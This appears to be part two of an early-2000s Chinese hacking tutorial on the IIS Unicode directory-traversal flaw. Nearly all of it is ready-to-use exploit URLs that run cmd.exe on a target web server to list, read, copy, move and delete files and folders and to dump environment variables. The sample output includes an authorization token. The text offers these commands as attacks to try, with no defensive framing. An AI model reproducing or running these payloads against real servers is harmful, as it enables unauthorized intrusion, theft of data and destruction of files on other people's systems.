UNICODE编码漏洞全攻略-2

/ns/ld/win/data/20010426131309.htm

―――――――――――――――――――――――――――――――――三、UNICODE编码漏洞简单利用的命令
一般情况下我们用
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
看到的目录是空的：（例如）
Directory of C:＼inetpub＼scripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 ..
如果我们这样输入的话：
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:＼
就可以看到该主机c:盘的目录和文件了。
其他的一些简单的用法：
1、显示文件内容
如果想显示里面的其中一个badboy.txt文本文件，我们可以这样输入
（htm,html，asp,bat等文件都是一样的）
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:＼badboy.txt
那么该文件的内容就可以通过IE显示出来。
2、建立文件夹的命令
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md+c:＼badboy
运行后我们可以看到返回这样的结果：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
英文意思是
CGI错误
具体的CGI申请有误，不能返回完整的HTTP标题，返回的标题为：
3、删除空的文件夹命令：
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:＼badboy
返回信息同上
4、删除文件的命令:
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:＼badboy.txt
返回信息同上
5、copy文件且改名的命令：
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:＼badboy.txt bad.txt
返回信息：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
1 file(s) copied.
6、显示目标主机当前的环境变量
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set
返回的信息：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
ALLUSERSPROFILE=E:＼Documents and Settings＼All Users
AUTH_TYPE=Negotiate
AUTH_USER=BADBOYCL-DQQZQQ＼badboy
CASL_BASEDIR_ENV=E:＼scan＼CyberCop Scanner＼casl
CommonProgramFiles=E:＼Program Files＼Common Files
COMPUTERNAME=BADBOYCL-DQQZQQ
ComSpec=E:＼WINNT＼system32＼cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=127.0.0.1
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
HTTP_AUTHORIZATION=Negotiate TlRMTVNTUAADAAAAGAAYAIgAAAAYABgAoAAAAB4AHgBAAAAADAAMAF4AAAAeAB4AagAAAAAAAAC4AAAABYKAgEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAGIAYQBkAGIAbwB5AEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAODLOAUsBqOAQ3/+AfwqHKj8Q2vzSAGGgkD6hCEY0EoOIKZVHMr4lmc1Ju37n7SleT==
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_I
7、把某个文件夹内的全部文件一次性COPY到另外的文件夹去
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+xcopy c:＼badboy c:＼inetpub＼wwwroot
返回的信息：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
我们查看c:＼inetpub＼wwwroot文件夹，结果所有c:＼badboy内的都拷贝到该目录里了
8、把某个文件夹剪贴到指定的目录去
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+move c:＼badboy c:＼inetpub＼wwwroot
呵呵，还是可以做到的，时间的长短要看文件的多少了
9、显示某一路径下相同文件类型的文件内容
http://127.0.0.1/scripts/..%c1%1c..＼winnt/system32/find.exe?/n+/v+""+c:＼inetpub＼wwwroot＼*.ht*
完全显示出来呀
同样，还有很多命令可以执行，大家可以试试，不过有些时间会很久，有些
是不能执行的。
解释+号，在这里+等于空格键，当然你也可以用空格键，用空格键运行后会
转换为%20 和%c1%1c=/是同一道理的。
对于名字超过8个字母的文件夹，如果我们想看里面的内容时就有点不同了
比如说我们想看目标主机Program Files文件夹里面的内容时，应该这样输入
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:＼progra~1
这里就不能用+或者%20来代替program与files间的空格。
至于对aa bb这样中间带有空格的文件夹怎么看，目前我还不知道，如果谁知道
可以写出来。